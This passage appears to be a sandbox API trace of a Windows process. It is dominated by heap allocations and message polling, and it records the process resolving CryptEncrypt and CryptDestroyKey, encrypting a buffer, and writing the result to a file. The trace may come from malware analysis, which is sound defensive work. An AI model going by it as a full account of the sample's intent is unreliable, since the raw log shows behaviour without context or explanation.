(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0240.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e514f0 [0240.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e514f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0240.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0240.657] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0240.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f648 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0240.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0240.658] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf3460*, pdwDataLen=0x8cef60*=0xccb, dwBufLen=0xcd0 | out: pbData=0x3bf3460*, pdwDataLen=0x8cef60*=0xcd0) returned 1 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0240.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0240.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0240.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0240.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0240.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0240.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0240.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55268 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0240.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55138 [0240.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0240.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0240.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0240.662] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0240.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0240.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0240.662] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0240.662] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0240.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.662] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0240.662] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0240.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.662] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.663] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0240.663] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0240.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.663] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0240.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0240.663] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf0dd8*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0dd8*, lpNumberOfBytesWritten=0x8cf5e4*=0xcd0, lpOverlapped=0x0) returned 1 [0240.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0240.665] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0240.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0240.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0240.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0240.666] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0240.666] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0240.666] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.666] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0240.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.667] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0240.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0240.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e510d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0240.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0240.667] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0240.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0240.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0240.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.668] 